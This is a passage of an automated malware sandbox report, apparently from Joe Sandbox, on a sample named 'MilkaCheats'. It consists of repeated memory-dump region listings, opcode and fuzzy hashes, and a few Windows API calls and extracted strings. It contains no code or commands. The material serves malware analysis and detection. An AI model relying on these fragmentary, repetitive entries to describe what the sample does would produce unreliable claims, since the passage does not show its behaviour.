                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              • Opcode ID: b508d072588b1794b6801fa593924ba843f17a0cce132e075ec88cd76cbf8606
                                                                                              • Instruction ID: 6460ea78ddbb2c7222c5f2a1042cc0d9684d8bd0f9abf6783870e6d4f2b5aacd
                                                                                              • Opcode Fuzzy Hash: b508d072588b1794b6801fa593924ba843f17a0cce132e075ec88cd76cbf8606
                                                                                              • Instruction Fuzzy Hash: FEF03C76A40204EFDB10DF58E882B9C77F1EB05721F10412BF5159B3A2CAB589808F90
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DDD3C,00000001,?,?,?,000DE5A7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000DDE1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: d2f5723994bb9203e3605df3684744d887d2b5ee162dd8ed9dd6320e6c64872b
                                                                                              • Instruction ID: a188c1cbefb8376f66704e6e63265d13c22ff3ac0f30768356ae4c4fd7d3848e
                                                                                              • Opcode Fuzzy Hash: d2f5723994bb9203e3605df3684744d887d2b5ee162dd8ed9dd6320e6c64872b
                                                                                              • Instruction Fuzzy Hash: 7BF0E53A30034557DF14AF3AE8556AA7FD5EFC1720B46405BEB068F351D6759843C7A0
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,000D2E4B,?,20001004,00000000,00000002,?,?,000D244D), ref: 000D59FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 4fc59a491c5911bc223c49f5a2ce335177807589d93f73c0b7e22996c8858fe6
                                                                                              • Instruction ID: 90766ac4c6260a317cafaa054bc841bc35b0965ec223a072bd73a38fc9974462
                                                                                              • Opcode Fuzzy Hash: 4fc59a491c5911bc223c49f5a2ce335177807589d93f73c0b7e22996c8858fe6
                                                                                              • Instruction Fuzzy Hash: ECE0DF32900B6CBBCF126F60DC05FEE3E15EF40B23F400012FC052A221CB329C20AAA8
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00007918,000C6CF7), ref: 000C7911
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: InA>
                                                                                              • API String ID: 0-2903657838
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8977
                                                                                              • API String ID: 0-400282742
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 89
                                                                                              • API String ID: 0-155395596
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >ebg
                                                                                              • API String ID: 0-4222723227
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MZx
                                                                                              • API String ID: 0-2575928145
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a521c380a6ef59328f7263234433a188d269ef9d4b63ae2ff511dab9f2c41131
                                                                                              • Instruction ID: 26bd99451c3dad2909b096e10c746361a23b15394e717f4721b7e7cb182824d9
                                                                                              • Opcode Fuzzy Hash: a521c380a6ef59328f7263234433a188d269ef9d4b63ae2ff511dab9f2c41131
                                                                                              • Instruction Fuzzy Hash: 16C1E071615F808FD3269B38C8583A6BBE5AB56324F188E7DD8FB873C6D775A1048702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d24232fb38b14cede3f649859ab0cd925123cd61fd3696532827271080bb123
                                                                                              • Instruction ID: 997d8ca6de5d3d8f31913e6b7e79b25ed553f706e887e88ed8e97334f5f85117
                                                                                              • Opcode Fuzzy Hash: 5d24232fb38b14cede3f649859ab0cd925123cd61fd3696532827271080bb123
                                                                                              • Instruction Fuzzy Hash: 40A1DE31A0C3868FD714CE24C0943BEBBE2AFD5304F18896DEAD567792D3359949DB82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 469aef10517c8e6ed11567e95d59437010425f616737405d574992db5c7d68d2
                                                                                              • Instruction ID: 3a50d81f21baffcf5e6f02ce51dd085eb7892639d962efcd1379c2d438dd7efd
                                                                                              • Opcode Fuzzy Hash: 469aef10517c8e6ed11567e95d59437010425f616737405d574992db5c7d68d2
                                                                                              • Instruction Fuzzy Hash: C981D4783007409FD7698B68C8D0A3673A2FB99320F64AA6DD6D7476A6C771EC42CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58e011baf1f274a15ca0d2b85e0930cb7fbb668362ca05df75c81775f8321d0a
                                                                                              • Instruction ID: b37447ddc7ed5dca2de04ad2a240cbfb6fe3faca50354ade1431564455d7efcb
                                                                                              • Opcode Fuzzy Hash: 58e011baf1f274a15ca0d2b85e0930cb7fbb668362ca05df75c81775f8321d0a
                                                                                              • Instruction Fuzzy Hash: A0B1D071508B808FD725DB38C8597AABFE0AB56314F484E6DD4EBC7382E375E0098B52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 563d7daf164b4fed33da84d1926617c64e4ef01414d8237d64bb4c958d90a038
                                                                                              • Instruction ID: 0ead804769a89140c6557445affd36570b50f3f738ea79304fa8c0113e74adc2
                                                                                              • Opcode Fuzzy Hash: 563d7daf164b4fed33da84d1926617c64e4ef01414d8237d64bb4c958d90a038
                                                                                              • Instruction Fuzzy Hash: A381F4B96043129FD718DF18C891A2AB7F2FF98710F19852CE9958B361E730EE51CB85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb8faee804e823a104e24101c70fdb1ab6c5a7c9383b4e6ba0c93962bc8aa6c7
                                                                                              • Instruction ID: 62f421c7cbbaf2dc15432730546d84512a922752dd47936b7735ac107cf2f49c
                                                                                              • Opcode Fuzzy Hash: fb8faee804e823a104e24101c70fdb1ab6c5a7c9383b4e6ba0c93962bc8aa6c7
                                                                                              • Instruction Fuzzy Hash: 91B12872609B808BC3158A38D8943EABFE2AFD6314F1D897CD4DE8B346DB396449C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a725ce10067c5c86e93e244941834ec4d336aa822e19a2b916f881735527c625
                                                                                              • Instruction ID: 8d3e1d961eb3c2ac075d339de2ebd563ad179ae47785eb33ee55dc39f6307804
                                                                                              • Opcode Fuzzy Hash: a725ce10067c5c86e93e244941834ec4d336aa822e19a2b916f881735527c625
                                                                                              • Instruction Fuzzy Hash: DA9140B2A083499BE7658E55C48033BB7D2AFA0324F1C857DEA854B751D7F4DE09E382
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c86c58ad7a1e8342798cdd8c05a9322cebf3141648c40c5ae5c6ccf8a9b1d0ad
                                                                                              • Instruction ID: c77342cb72f51e18c6f4d668e0ed66babc1206b08baac3af48dbfdc800a26d5c
                                                                                              • Opcode Fuzzy Hash: c86c58ad7a1e8342798cdd8c05a9322cebf3141648c40c5ae5c6ccf8a9b1d0ad
                                                                                              • Instruction Fuzzy Hash: 1951E1B06043049BEB249F24CC96BB733B4EF82B68F054568F985CB291F375D840C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2199d5db8f011725805a65f7e69af872dd2df59057d4f4cabfeae211ddd84e5b
                                                                                              • Instruction ID: e4a25dcfb8be5cfe88e515da5682c476b1de16274a9200679b0da4a06357a852
                                                                                              • Opcode Fuzzy Hash: 2199d5db8f011725805a65f7e69af872dd2df59057d4f4cabfeae211ddd84e5b
                                                                                              • Instruction Fuzzy Hash: 38A10775A08B808FD3158B38D4953A7BFE2AF96304F08897DD4EE8B387D77964498712
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75587898d4b20287e5d10b609ca1fbdbe6397157e5c19bc964121fa90aad5611
                                                                                              • Instruction ID: b858f25b15917993ecf38bed5650bdf12b2668f9bcb542bb5b467b8cb735ca3d
                                                                                              • Opcode Fuzzy Hash: 75587898d4b20287e5d10b609ca1fbdbe6397157e5c19bc964121fa90aad5611
                                                                                              • Instruction Fuzzy Hash: 2BA1E571A08B908FD3158B38D4953ABBFE1AF96308F09887CC5DE8B747D6796409CB12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd581b6ec7c7f425c63cc146eff1f25cbf105340cfe496fa68f084a1933940c1
                                                                                              • Instruction ID: 3d4e642e0b278a75a9b60b5d5c7f28abba1c20a54278d69b99d0480e6379e9b5
                                                                                              • Opcode Fuzzy Hash: dd581b6ec7c7f425c63cc146eff1f25cbf105340cfe496fa68f084a1933940c1
                                                                                              • Instruction Fuzzy Hash: 52314AB3E14A2C0BD71C9D2DAC1527A71828BD4215F4EC37DDC6A8F3C6EE344D159281
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bcf606195e4c766e80ba9320d91c2f8eeec9d3833f6af36b7d63a8ad953fce48
                                                                                              • Instruction ID: cd4287c316904ce81a44bdab21cb484f4ac7aadcdef47fc2b9e90a592c30dde3
                                                                                              • Opcode Fuzzy Hash: bcf606195e4c766e80ba9320d91c2f8eeec9d3833f6af36b7d63a8ad953fce48
                                                                                              • Instruction Fuzzy Hash: C431B4342447058BEB79DB65D8A093673E3AF98300B54586DD6870BEA7CB30BC82DB44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b97b03205b5aa80ded3f4eb2b9659e2a0b8168608e27587488d4f19b3477fa95
                                                                                              • Instruction ID: ef1878413f2572013884cd0d6c4d27ff6266847ed3c768bb76897fb67446200d
                                                                                              • Opcode Fuzzy Hash: b97b03205b5aa80ded3f4eb2b9659e2a0b8168608e27587488d4f19b3477fa95
                                                                                              • Instruction Fuzzy Hash: 1D21B431F045654FCB0DCE7C88A11BEFAE67B8E214F09D66AD426E7296D73099004B84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
